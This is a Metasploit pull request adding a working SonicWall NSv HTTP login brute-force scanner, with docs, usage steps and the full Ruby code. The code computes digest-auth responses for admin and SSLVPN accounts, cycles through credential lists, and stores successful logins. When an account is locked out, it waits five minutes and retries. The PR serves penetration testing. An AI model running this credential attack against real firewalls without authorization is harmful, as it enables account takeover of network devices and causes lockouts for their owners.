### PR TITLE
SonicWall NSv HTTP Login Module

### DIFF
--- a/documentation/modules/auxiliary/scanner/sonicwall/login_scanner.md
+++ b/documentation/modules/auxiliary/scanner/sonicwall/login_scanner.md
@@ -1,0 +1,19 @@
+## Description
+
+The module performs bruteforce attack against SonicWall NSv (Network Security Virtual).
+It allows to attack both regular SSLVPN user and admin as well. The module will automatically perform attack against SSLVPN user if `DOMAIN` parameter is not empty.
+
+## Vulnerable Application
+
+- [SonicWall](https://www.sonicwall.com/resources/trials-landing/sonicwall-nsv-next-gen-virtual-firewall-trial)
+
+## Verification Steps
+
+1. `use auxiliary/scanner/sonicwall/login_scanner`
+2. `set RHOSTS [IP]`
+3. either `set USERNAME [username]` or `set USERPASS_FILE [usernames file]`
+4. either `set PASSWORD [password]` or `set PASS_FILE [passwords file]`
+5. `set DOMAIN [domain to attack/empty string to attack admin account]`
+6. `run`
+
+

--- a/lib/metasploit/framework/login_scanner/sonicwall.rb
+++ b/lib/metasploit/framework/login_scanner/sonicwall.rb
@@ -1,0 +1,170 @@
+require 'metasploit/framework/login_scanner/http'
+
+module Metasploit
+  module Framework
+    module LoginScanner
+      # SonicWall Login Scanner supporting
+      # - User Login
+      # - Admin Login
+      class SonicWall < HTTP
+
+        DEFAULT_SSL_PORT = [443, 4433]
+        LIKELY_PORTS = [443, 4433]
+        LIKELY_SERVICE_NAMES = [
+          'SonicWall Network Security'
+        ]
+        PRIVATE_TYPES = [:password]
+        REALM_KEY = nil
+
+        def initialize(scanner_config, domain)
+          @domain = domain
+          super(scanner_config)
+        end
+        
+        def req_params_base
+          {
+            'method' => 'POST',
+            'uri' => normalize_uri('/api/sonicos/auth'),
+            'ctype' => 'application/json',
+            # Force SSL as the application uses non-standard TCP port for HTTPS - 4433
+            'ssl' => true
+          }
+        end
+
+        def auth_details_req
+          params = req_params_base
+          
+          #
+          # Admin and SSLVPN user login procedure differs only in usage of domain field in JSON data
+          #
+          
+          if @domain == ''
+            params.merge!({'data' => JSON.pretty_generate({
+              'override' => false,
+              'snwl' => true
+            })})
+
+          else
+            params.merge!({'data' => JSON.pretty_generate({
+              'domain' => @domain,
+              'override' => false,
+              'snwl' => true
+            })})
+          end
+          return params
+        end
+
+        def auth_req(header)
+
+          params = req_params_base
+          
+          params.merge!({
+              'headers'=> 
+              {
+                'Authorization' => header.join(', ')
+              }
+            })
+
+          if @domain == ''
+            params.merge!({'data' => JSON.pretty_generate({
+              'override' => false,
+              'snwl' => true
+            })})
+
+          else
+            params.merge!({'data' => JSON.pretty_generate({
+              'domain' => @domain,
+              'override' => false,
+              'snwl' => true
+            })})
+          end
+          return params
+        end
+
+        def get_auth_details(username, password)
+          send_request(auth_details_req)
+        end
+
+        def try_login(header)
+          send_request(auth_req(header))
+        end
+
+        def get_resp_msg(msg)
+          msg.dig('status', 'info', 0, 'message')
+        end
+
+        def check_setup
+          request_params = {
+            'method' => 'GET',
+            'uri' => normalize_uri('/sonicui/7/login/')
+          }
+          res = send_request(request_params)
+          if res && res.code == 200 && res.body&.include?('SonicWall')
+            return false
+          end
+
+          'Unable to locate "SonicWall" in body. (Is this really SonicWall?)'
+        end
+
+        #
+        # The login procedure is two-step procedure for SonicWall due to HTTP Digest Authentication. In the first request, client receives data,cryptographic hashes and algorithm selection from server. It should calculate final response hash from username, password and additional data received from server. The second request contains all this information.
+        #
+        def do_login(username, password, depth)
+           return { status: ::Metasploit::Model::Login::Status::UNABLE_TO_CONNECT, proof: 'Waiting too long in lockout' } if depth >= 2
+
+          #-- get authentication details from first request
+          res = get_auth_details(username, password)
+
+          return { status: ::Metasploit::Model::Login::Status::UNABLE_TO_CONNECT, proof: 'Invalid response' } unless res
+          return { status: ::Metasploit::Model::Login::Status::UNABLE_TO_CONNECT, proof: 'Failed to receive a authentication details' } unless res&.headers && res.headers.key?('X-SNWL-Authenticate')
+
+          res.headers['X-SNWL-Authenticate'] =~ /Digest (.*)/
+
+          parameters = {}
+          ::Regexp.last_match(1).split(/,[[:space:]]*/).each do |p|
+            k, v = p.split('=', 2)
+            parameters[k] = v.gsub('"', '')
+          end
+          return { status: ::Metasploit::Model::Login::Status::UNABLE_TO_CONNECT, proof: 'Incorrect authentication header' } if parameters.empty?
+
+          digest_auth = Rex::Proto::Http::AuthDigest.new
+          auth_header = digest_auth.digest(username, password, 'POST', '/api/sonicos/auth', parameters)
+          return { status: ::Metasploit::Model::Login::Status::UNABLE_TO_CONNECT, proof: 'Could not calculate hash' } unless auth_header
+
+          #-- send the actual request with all hashes and information
+
+          res = try_login(auth_header)
+
+          return { status: ::Metasploit::Model::Login::Status::SUCCESSFUL, proof: res.to_s } if res&.code == 200
+
+          return { status: ::Metasploit::Model::Login::Status::INCORRECT, proof: res.to_s } unless res&.body
+
+          msg_json = JSON.parse(res&.body)
+
+          return { status: ::Metasploit::Model::Login::Status::INCORRECT, proof: res.to_s } unless msg_json && msg_json.is_a?(Hash)
+
+          msg = get_resp_msg(msg_json)
+
+          if msg == 'User is locked out'
+            sleep(5 * 60)
+            return do_login(username, password, depth + 1)
+          end
+
+          return { status: ::Metasploit::Model::Login::Status::INCORRECT, proof: msg }
+        end
+
+        def attempt_login(credential)
+          result_options = {
+            credential: credential,
+            host: @host,
+            port: @port,
+            protocol: 'tcp',
+            service_name: 'sonicwall'
+          }
+          result_options.merge!(do_login(credential.public, credential.private, 1))
+          Result.new(result_options)
+        end
+      end
+    end
+  end
+end

--- a/modules/auxiliary/scanner/sonicwall/login_scanner.rb
+++ b/modules/auxiliary/scanner/sonicwall/login_scanner.rb
@@ -1,0 +1,84 @@
+require 'metasploit/framework/login_scanner/sonicwall'
+require 'metasploit/framework/credential_collection'
+
+class MetasploitModule < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::AuthBrute
+  include Msf::Auxiliary::Report
+  include Msf::Auxiliary::Scanner
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'name' => 'SonicWall HTTP Login Scanner',
+        'Description' => %q{This module adds HTTP Login scanning for SonicWall NSv. It allows scanning both admin and user accounts.},
+        'Author' => ['msutovsky-r7'],
+        'License' => MSF_LICENSE,
+        'DefaultOptions' => {
+          'RPORT' => 4433
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [],
+          'SideEffects' => [IOC_IN_LOGS, ACCOUNT_LOCKOUTS]
+        }
+      )
+    )
+    register_options([
+      OptString.new('DOMAIN', [true, 'Select whether to test admin account', 'LocalDomain'])
+    ])
+  end
+
+  def get_scanner(ip)
+    cred_collection = Metasploit::Framework::CredentialCollection.new(
+      blank_passwords: datastore['BLANK_PASSWORDS'],
+      pass_file: datastore['PASS_FILE'],
+      password: datastore['PASSWORD'],
+      user_file: datastore['USER_FILE'],
+      userpass_file: datastore['USERPASS_FILE'],
+      username: datastore['USERNAME'],
+      user_as_pass: datastore['USER_AS_PASS']
+    )
+    configuration = configure_http_login_scanner(
+      host: ip,
+      port: datastore['RPORT'],
+      cred_details: cred_collection,
+      stop_on_success: datastore['STOP_ON_SUCCESS'],
+      bruteforce_speed: datastore['BRUTEFORCE_SPEED'],
+      connection_timeout: datastore['HttpClientTimeout']
+    )
+    Metasploit::Framework::LoginScanner::SonicWall.new(configuration, datastore['DOMAIN'])
+  end
+
+  def process_credential(credential_data)
+    credential_combo = "#{credential_data[:username]}:#{credential_data[:private_data]}"
+    case credential_data[:status]
+    when Metasploit::Model::Login::Status::SUCCESSFUL
+      print_good "#{credential_data[:address]}:#{credential_data[:port]} - Login Successful: #{credential_combo}"
+      credential_data[:core] = create_credential(credential_data)
+      create_credential_login(credential_data)
+      return { status: :success, credential: credential_data }
+    else
+      error_msg = "#{credential_data[:address]}:#{credential_data[:port]} - LOGIN FAILED: #{credential_combo} (#{credential_data[:status]})"
+      vprint_error error_msg
+      invalidate_login(credential_data)
+      return { status: :fail, credential: credential_data }
+    end
+  end
+
+  def run_scanner(scanner)
+    scanner.scan! do |result|
+      credential_data = result.to_h
+      credential_data.merge!(module_fullname: fullname, workspace_id: myworkspace_id)
+      process_credential(credential_data)
+    end
+  end
+
+  def run_host(ip)
+    scanner = get_scanner(ip)
+    run_scanner(scanner)
+  end
+
+end


### PR DESCRIPTION
## SonicWall NSv Auxiliary Module
Adding HTTP Login Scanner for SonicWall NSv. The `SonicWall` class can attack both admin accounts and SSLVPN users. For attacking only admin account, the parameter `DOMAIN` should be unset. SSLVPN accounts can be attacked, if `DOMAIN` is specified. The default value is `LocalDomain`. 

## Steps

1. `use auxiliary/scanner/sonicwall/login_scanner`
2. `set RHOSTS [IP]`
3. either `set USERNAME [username]` or `set USERPASS_FILE [usernames file]`
4. either `set PASSWORD [password]` or `set PASS_FILE [passwords file]`
5. `set DOMAIN [domain to attack/empty string to attack admin account]`
6. `run`